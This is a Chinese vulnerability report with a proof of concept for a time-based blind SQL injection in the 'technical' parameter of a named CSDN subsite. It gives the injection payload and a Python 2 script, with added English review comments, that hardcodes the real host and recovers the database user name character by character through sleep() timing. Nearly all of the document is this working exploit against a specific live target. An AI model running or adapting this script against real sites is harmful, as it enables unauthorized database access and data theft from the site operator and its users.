CSDN某分站SQL盲注漏洞(附poc)===== 时间延迟

URL:http://ibmuniversity.csdn.net/m/zone/ibm/rockstack?search=%e6%90%9c%e7%b4%a2&technical=*

存在问题参数是:technical

payload:(select(0)from(select(sleep(3)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(XXXX)))v)%2b%22*/



sqlmap跑不出来,用python跑,不过这里需要修改一下payload

(select(0)from(select(sleep(3)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(if(****,sleep(XXXX),0)))v)%2b%22*/



# -*- coding: utf-8 -*-

#!/usr/bin/env python

#mysql_timebased.py

#version 1.0



import httplib

import urllib



# Request headers sent with every probe below: a fixed desktop-browser User-Agent.
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0'}

# Candidate characters tried, in this order, at each position of the user() string.
# The alphabet is lowercase-only because the SQL condition in GetUser wraps user() in lower().
payloads = 'abcdefghijklmnopqrstuvwxyz1234567890.@_*%'



def GetUlength():  # Infer the length of the DB user() string using the timing oracle below.

    """Return the first i in 1..98 for which all three probe requests raised, else 0.

    The oracle is the 4-second HTTPConnection timeout: s1 is a boolean SQL
    condition, and the template in s wraps it in if(<cond>, sleep(2), 0) so
    the reply is intended to arrive late only when the condition holds. A
    request that raises is counted in err_count; i is accepted only when all
    three attempts raised. The bare except counts every exception the same
    way (DNS failure, connection refused, any httplib error), so network
    problems can yield a false positive -- there is no check of the
    exception type.

    NOTE(review): from the server side each i is a burst of three GETs to the
    same path whose `technical` parameter carries sleep(/if( -- that string is
    the obvious log/WAF signature for this kind of probe.
    """

    userlen = 0

    for i in range(1,99):

        err_count = 0

        # Three probes per candidate length; a single late reply is not trusted.
        for j in range(3):

            try:

                s1 = "length(user())=%s" % i

                s = "(select(0)from(select(sleep(3)))v)/*%27%2b(select(0)from(select(sleep(3)))v)%2b%27%22%2b(select(1)from(select(if("+s1+",sleep(2),0)))v)%2b%22*/"

                url = '/m/zone/ibm/rockstack?search=%e6%90%9c%e7%b4%a2&technical='+s

                #body = "page=20"

                # timeout=4 is the oracle threshold: a reply slower than this raises.
                conn = httplib.HTTPConnection('ibmuniversity.csdn.net',timeout=4)

                conn.request(method='GET',headers=headers,url=url)

                conn.getresponse()

                conn.close()

                # Progress marker; printed only for requests that came back in time.
                print '*',

            except:

                # Any exception (not just a timeout) is treated as "delayed".
                err_count +=1

        # All three probes raised -> accept i as the length and stop.
        if err_count == 3:

            userlen = i

            break

    return userlen



def GetUser(l):  # Recover the lowercased user() string one character at a time.

    """Return the characters recovered for positions 1 .. l-1 of lower(user()).

    For each position i the candidates in `payloads` are tried in order; each
    candidate is probed three times with the same timeout oracle as
    GetUlength (timeout=4, bare except, err_count == 3 means "true"). The
    first candidate whose three probes all raised is appended to `user` and
    the loop moves to the next position; a position where no candidate
    satisfies the oracle contributes nothing, so the returned string can be
    shorter than l-1. As in GetUlength, non-timeout exceptions are counted
    the same as a late reply.

    Args:
        l: the length value produced by GetUlength; the loop is range(1, l).
    """

    user = ''

    # Positions 1 .. l-1 of the lowercased user() string (mid() is 1-based).
    for i in range(1,l):

        for payload in payloads:

            err_count = 0

            #print payload

            # Three probes per (position, candidate) pair.
            for j in range(3):

                try:

                    # Compare the byte at position i with this candidate's code point.
                    s1 = "ascii(mid(lower(user()),%s,1))=%s" % (i,ord(payload))

                    s = "(select(0)from(select(sleep(3)))v)/*%27%2b(select(0)from(select(sleep(3)))v)%2b%27%22%2b(select(1)from(select(if("+s1+",sleep(2),0)))v)%2b%22*/"

                    url = '/m/zone/ibm/rockstack?search=%e6%90%9c%e7%b4%a2&technical='+s

                    #body = "page=20"

                    # Same 4-second oracle threshold as GetUlength.
                    conn = httplib.HTTPConnection('ibmuniversity.csdn.net',timeout=4)

                    conn.request(method='GET',headers=headers,url=url)

                    conn.getresponse()

                    conn.close()

                    print '*',

                except:

                    # Any exception counts as "delayed"; the type is not inspected.
                    err_count +=1

            # All three probes raised -> accept this candidate and go to the next position.
            if err_count == 3:

                user += payload

                print '\n[info]',user

                break

    return user

                

def main():

    """Run the two stages in order and print their results.

    GetUlength's return value is passed straight to GetUser, so a 0 (no
    length found) makes GetUser's range(1, 0) empty and an empty string is
    printed as the user.
    """

    userlen = GetUlength()

    print "user length:\n",userlen

    current_user = GetUser(userlen)

    print "\n CurrentUser is :",current_user





# Script entry point (Python 2 print statements and httplib: this file is Python 2 only).
if __name__ == '__main__':

    print 'mysql-timebased-sqlinjection:\n'

    main()

